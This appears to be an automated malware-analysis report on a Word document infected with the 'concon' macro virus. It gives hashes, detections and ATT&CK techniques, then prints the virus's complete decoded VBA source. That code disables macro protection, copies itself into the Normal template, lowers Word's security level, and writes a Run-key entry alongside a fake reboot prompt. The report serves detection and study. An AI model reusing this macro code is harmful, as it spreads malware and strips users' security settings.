Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1df4b74f806456d6…

MALICIOUS

Office (OLE)

Size: 30.0 KB
Created: 2000-04-25 19:04:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 7cbab9b59757fbc0f8be88b22c77f063
SHA-1: c2043c5496f8c3d8dcd4034dcaf84cddfb1ad221
SHA-256: 1df4b74f806456d64f3467f36144c996684a44a121fb6ddb546fb365ecbdd557
Risk Score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document containing a VBA macro with an AutoClose subroutine. The macro exports its own module to disk and imports that copy into the Normal template, indicating an attempt to establish persistence across documents. It also attempts to write to the registry Run key with the value 'c:\con\con', likely to execute a second-stage payload.

Heuristics (4)

  • ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1966 bytes
SHA-256: 43d230fe7d1be1336a058c5ef266bbf663c501476efa76ca1133c9ef01a04c27
Detection: ClamAV: Doc.Trojan.Concon-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "concon"
Sub AutoClose()
On Error Resume Next
Dim FY, SNP
FY = (Rnd * 0)
SNP = (Rnd * 0)
Options.VirusProtection = FY
Options.SaveNormalPrompt = SNP
Application.EnableCancelKey = wCancelDisabled
Application.DisplayStatusBar = (Rnd * 0)
Application.ScreenUpdating = (Rnd * 0)
Application.DisplayAlerts = wdAlertsNone
CommandBars("Tools").Controls("Macro").Delete
Const Exportf = "c:\boot.386"
Const Ego = "concon"
Set ADoc = ActiveDocument.VBProject.VBComponents
Set NTmp = NormalTemplate.VBProject.VBComponents
ADoc(Ego).Export Exportf
NTmp(Ego).Export Exportf
For I = 1 To NTmp.Count
If NTmp(I).Name = Ego Then NtmpOK = True
Next I
For I = 1 To ADoc.Count
If ADoc(I).Name = Ego Then DocOK = True
Next I
If DocOK = True And NtmpOK = False Then Set Stoj = NormalTemplate.VBProject _
Else: If DocOK = False And NtmpOK = True Then Set Stoj = ActiveDocument.VBProject
Stoj.VBComponents.Import Exportf
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
Call Pay
End Sub
Sub Pay()
Dim Xday, Strn
Xday = Date
Strn = Format(Xday, "d")
If Strn = 31 Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "") = "c:\con\con"
Dim Msg, Style, Title, Response
Msg = "Shutdown all applications and reboot"
Style = vbOK + vbCritical + vbSystemModal
Title = "Error"
Response = MsgBox(Msg, Style, Title)
End If
' (c) Pvx 2000 only for research purposes
' concon exploit virus (word97/2000 compatible) dont distribute
End Sub